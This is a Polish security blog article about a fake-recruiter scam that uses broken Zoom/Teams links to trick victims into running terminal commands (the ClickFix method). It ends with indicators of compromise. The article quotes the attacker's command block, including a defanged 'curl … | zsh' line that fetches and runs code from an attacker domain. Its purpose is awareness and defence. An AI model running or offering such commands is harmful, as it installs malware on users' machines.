Kolejny scam rekrutacyjny: pisze do Ciebie rekruter, ale zamiast pracy proponuje… instalację malware na komputerze

Historię opisał Bogdan Chadkin na swoim blogu. Pewnego dnia otrzymał wiadomość z propozycją pracy. Joan, przedstawiający się jako CTO pewnego europejskiego startupu fintech, poprosił o przeniesienie rozmowy na Telegram (red flag nr 1). 

TLDR:

• Atakujący prowadzą “proces rekrutacyjny” i wysyłają ofiarom fałszywe linki do spotkań Zoom/Teams.
• Po zainicjowaniu kontaktu na LinkedIn ofiara jest proszona o przeniesienie rozmowy na Telegram.
• Atakujący przesyłają ofierze polecenia do “usunięcia błędu” uniemożliwiającego połączenie.
• Celem jest nakłonienie do wykonania komend typu curl | zsh, które instalują malware.
• Wykorzystywane są przejęte, wiarygodne konta i firmy.

Rozmowa miała odbyć się w aplikacji Microsoft Teams. Strona z otrzymanego linku nie działała poprawnie na telefonie. Z racji że laptop Bogdana był wtedy w serwisie, zaproponował on spotkanie na Google Meet lub inne narzędzie, które zadziała na smartfonie. Joan naciskał, by zamiast tego przełożyć spotkanie na inny termin (red flag nr 2).

Gdy Bogdan odebrał swojego laptopa, otrzymał od Joana kolejny link do spotkania. Tym razem nie działał dźwięk, a strona poprosiła o “aktualizację SDK” (red flag nr 3). Wklejenie identyfikatora z linku w aplikacji desktopowej kończyło się komunikatem “meeting not found”. Nie zwróciło to jednak uwagi Bogdana – w końcu mówimy o Microsoft Teams ;-)

Próba spotkania w Google Meet zakończyła się niepowodzeniem – obaj panowie się nie słyszeli. To także nie wzbudziło podejrzeń z racji niedawnej awarii laptopa. Finalnie umówili się na kolejne spotkanie, tym razem mieli skorzystać z komunikatora Zoom.

Przed rozmową Bogdan przetestował zarówno Google Meet jak i Zoom, żeby mieć pewność że wszystko zadziała.

Joan wysłał link do spotkania. Po jego kliknięciu nie uruchomiła się desktopowa aplikacja Zoom, więc Bogdan próbował połączyć się przez wersję webową. Zobaczył komunikat o konieczności “aktualizacji SDK” (red flag nr 3’). Ręczne wpisanie ID rozmowy w aplikacji nie pomogło. Joan odpisał, że rozmowy przez wersję webową nie są kompatybilne z programem desktopowym (red flag nr 4). Następnie podesłał Bogdanowi polecenia, które miały “naprawić błąd” – miał je on wkleić w swoim terminalu (red flag nr 5):

set MEETING_ROOM=”4030636137″ set AUTH_API_TOKEN=”Ya29.sInR16IkNiI5cCIpX.MzUxNDI1NzQ3OA” set MEETING_JWT=”eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.4030636137.signature” curl -s https://zoom[.]uz07web[.]us/api/mn/4030636137/update/2 | zsh set MEETING_TURN_SERVER=”turn:turn[.]zoom[.]us” set MEETING_SDK_VERSION=”v15.17.5.4569″ set UPDATE_METHOD=”manual” softwareupdate –evaluate-products –products zoom-meet-sdk –agree-to-license curl -s https://zoom[.]uz07web[.]us/api/mn/4030636137/update/2

Listing 1 – polecenia do “naprawy błędu” [nawiasy red.], źródło: trysound.io

Na tym etapie Bogdan zauważył, że w treści komend pojawiają się dziwne domeny. Zamiast zoom[.]us było zoom[.]uz07web[.]us.

Po sprawdzeniu okazało się, że także nadesłany link do spotkania wcale nie prowadził do domeny Zoom. Adres ten wyglądał bowiem tak:

https://zoom[.]uz07web[.]us/j/4030636137?pwd=nx3en3bbq6VTSU0K486J0vFxz4vMPZ.1

Listing 2 – fałszywy link do Zoom [nawiasy red.], źródło: trysound.io

Bogdan znalazł także otrzymany wcześniej link do Microsoft Teams. I on także prowadził do “nietypowej” domeny:

https://teams[.]microsomeet[.]com/meet/9973477680?pwd=rVfAJBNjBxBlMwXKrU0SI0YUzmjsgz.1

Listing 3 – fałszywy link do Teams [nawiasy red.], źródło: trysound.io

Oba adresy na moment publikacji wciąż działają i prezentują fałszywy interfejs udający Zoom/Teams. Bogdan chciał dowiedzieć się więcej i znalazł raport Google Cloud opisujący podobny przypadek. Kontakt odbywał się również na Telegramie, jednak wtedy użyto domeny zoom[.]uswe05[.]us – całkiem podobna, prawda?

Sam mechanizm również był podobny. Chęć umówienia spotkania, przy którym następują problemy z połączeniem. Fałszywa strona prezentowała zestaw komend, które mogą pomóc naprawić błąd. Był zarówno wariant dla Windows, jak i dla macOS. Choć schemat oszustwa jest trochę bardziej rozbudowany, to całość sprowadza się do metody ClickFix – czyli nakłonienia ofiary do uruchomienia złośliwych poleceń na swoim urządzeniu.

Co ważne, w tamtym przypadku atakujący korzystał z przejętego konta. Bogdan podejrzewając, że w jego przypadku było podobnie, zgłosił sprawę firmie. Przeczucie okazało się słuszne, a prawdziwy Joan obiecał zmienić swoje hasło.

Dlaczego atakujący skorzystali z Telegrama? Powodów może być kilka. Po pierwsze, zmniejsza to szanse na potencjalne wykrycie ataku przez filtry antyspamowe na LinkedIn. Telegram pozwala również wysyłać linki sformatowane jako Markdown, a więc trudniej będzie zauważyć nieprawidłową domenę (o czym pisaliśmy tutaj). Możliwe jest także usuwanie wysłanych wiadomości, czego na LinkedIn nie ma.

Pisaliśmy już o różnych oszustwach rekrutacyjnych, jednak zazwyczaj złośliwe oprogramowanie dostarczane było w formie załączników/materiałów lub testowych repozytoriów z kodem (jak w tym przypadku). Tym razem atak zaczynał się już na etapie rozmowy wideo. Warto pamiętać, że nawet bardzo korzystna propozycja nie powinna usypiać naszej czujności, a wiarygodne konto rekrutera wcale nie oznacza, że to on się z nami kontaktuje.

IOC

Domeny:

• zoom[.]uz07web[.]us
• teams[.]microsomeet[.]com

Źródło: trysound.io

~Tymoteusz Jóźwiak